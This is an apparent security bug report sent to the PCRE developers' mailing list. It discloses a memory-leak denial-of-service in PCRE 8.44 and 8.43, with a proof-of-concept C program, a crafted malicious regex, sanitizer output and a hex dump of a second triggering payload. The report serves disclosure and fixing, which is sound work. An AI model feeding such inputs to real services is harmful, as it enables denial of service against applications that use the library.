https://bugs.exim.org/show_bug.cgi?id=2613
Bug ID: 2613 Summary: PCRE Library DoS through a Memory Leak vulnerability Product: PCRE Version: 8.44 Hardware: All OS: All Status: NEW Severity: security Priority: medium Component: Code Assignee: p...@hermes.cam.ac.uk Reporter: daniel.rom...@nccgroup.com CC: pcre-dev@exim.org A memory leak vulnerability was found in the PCRE library. This can be used to DoS the application which implements the PCRE library. Tested: 8.44 and 8.43 versions A proof of concept of this vulnerability is shown below: ========= $ valgrind --leak-check=full ./leak1-pcre ==26706== Memcheck, a memory error detector ==26706== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==26706== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info ==26706== Command: ./leak1-pcre ==26706== ==26706== ==26706== HEAP SUMMARY: ==26706== in use at exit: 5,120 bytes in 1 blocks ==26706== total heap usage: 4 allocs, 3 frees, 9,600 bytes allocated ==26706== ==26706== 5,120 bytes in 1 blocks are definitely lost in loss record 1 of 1 ==26706== at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==26706== by 0x406EC0: compile_branch (pcre_compile.c:7254) ==26706== by 0x406EC0: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== by 0x403A2E: compile_branch (pcre_compile.c:7769) ==26706== by 0x403A2E: compile_regex (pcre_compile.c:8408) ==26706== ==26706== LEAK SUMMARY: ==26706== definitely lost: 5,120 bytes in 1 blocks ==26706== indirectly lost: 0 bytes in 0 blocks ==26706== possibly lost: 0 bytes in 0 blocks ==26706== still reachable: 0 bytes in 0 blocks ==26706== suppressed: 0 bytes in 0 blocks ==26706== ==26706== For counts of detected and suppressed errors, rerun with: -v ==26706== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ========= PoC source code: ========= #include <pcre.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { pcre *reCompiled; int pcreExecRet; int subStrVec[30]; const char *pcreErrorStr; int pcreErrorOffset; char *aStrRegex; char *query_text = "Johns email address is joh...@johnnydoessql.com. Priscilla manages the http://www.johnnydoessql.com site. She also manages the site http://jilldoessql.com and can be reached at 345.678.9999 She can be reached at (123) 456-7890 and her email address is pri...@johnnydoessql.com or pri...@jilldoessql.com."; aStrRegex = "(?JJJ)>?W((?<a>!)||(?<a><aR)|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!)|;|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!)|(?<a>W!| P(?<e>!) C(?<a>!)||(?<a>!aR)|(?<a>!?!)||(?<a>)|(?<a>!6]|P(?<a>!)|(?<aa>!?!);|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR|(?<a>!?!);|(?<a>W!) (?<a>!)||(?<a>)|(?<a>||(?<a><a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!);|(?<a>W(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>|1|t(?<a>)(?<a>!??<aR)|(?<a>!:aW ) C(?<a>!)||(?<a>!aR)|(?<a>!?!|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>!(?<a>)(?<a><aR)|(?<a>!:aW ) C(?<a>!)|;|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!);|(?<aa>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!)|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>!?!)||(?<a>)|(?<a>!2]|P(?<a>!)|C(?<a>!()|(?<aa>!?!);|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR|(?<a>!?!);|(?<a>W!) __P(?<a>!-||(?<a>)|(?<a>||(?<a><a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!);|(?<a>W(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>|1|t(?<a>)(?<a>!??<a!) __P(?<a>!|(?<a>)|(?<a>!3]|P(?<a>!)|C(?<a>!)||(?<a>!aR)|(?<a>!?!);|(?<a>W!| P(?<a>!) C(?<a>!)|;|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>! m);|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>!?!)||(?<a>)|(?<a>!6]|P(?<a>!)|C(?<a>!()(?<aa>!?!);|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!?!);|(?<a>W!) !)||(?<a>)|(?<a>!6]|P(?<a>!)|(?<aa>!?!);|(?<a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR|(?<a>!?!);|(?<a>W!) (?<a>!)||(?<a>)|(?<a>||(?<a><a>W!| P(?<a>!) C(?<a>!)||(?<a>!aR(?<a>!aR)|(?<a>!?!);|(?<a>W(?<a>!) C(?<a>!)||(?<a>!aR)|(?<a>|1|t(?<a>)(?<a>!??<__P(?<a>!||(?<a>)|(?<a>||(?<a>!?<" reCompiled = pcre_compile(aStrRegex, 0, &pcreErrorStr, &pcreErrorOffset, NULL); if (reCompiled) { pcreExecRet = pcre_exec(reCompiled, 0, qery_text, strlen(query_text), 0, 0, subStrVec, 30); pcre_free(reCompiled); } return 0; } ========= Similarly, other payloads also triggered this vuln and can leak a different memory sizes: $ xxd d8cdb8d0ec1a6b1ecca2449d256fabeeb6774179 00000000: 283f 3c61 3e28 3f4a 2928 3f3c 613e 283f (?<a>(?J)(?<a>(? 00000010: 3c71 3e61 283f 3c71 3e28 3f3c 613e 283f <q>a(?<q>(?<a>(? 00000020: 3c71 3e21 283f 3c71 3e21 283f 3c61 3e28 <q>!(?<q>!(?<a>( 00000030: 3f3c 713e 283f 3c61 3e28 3f3c 613e 283f ?<q>(?<a>(?<a>(? 00000040: 3c71 3e28 3f3c 613e 283f 3c76 3e3e 283f <q>(?<a>(?<v>>(? 00000050: 3c71 3e7b 283f 3c61 3e28 3f3c 793e 283f <q>{(?<a>(?<y>(? 00000060: 3c61 3e3e 283f 3c71 3e61 283f 3c71 3e28 <a>>(?<q>a(?<q>( 00000070: 3f3c 753e ?<u> $ ./leak2-pcre d8cdb8d0ec1a6b1ecca2449d256fabeeb6774179 ================================================================= ==26012==ERROR: LeakSanitizer: detected memory leaks Direct leak of 640 byte(s) in 1 object(s) allocated from: #0 0x4e48c7 in malloc /<path>/asan/asan_malloc_linux.cc:146 #1 0x52c7e0 in compile_branch /<path>/pcre-8.44/pcre_compile.c:7254 #2 0x52c7e0 in compile_regex /<path>/pcre-8.44/pcre_compile.c:8408 SUMMARY: AddressSanitizer: 640 byte(s) leaked in 1 allocation(s). -- You are receiving this mail because: You are on the CC list for the bug. -- ## List details at https://lists.exim.org/mailman/listinfo/pcre-dev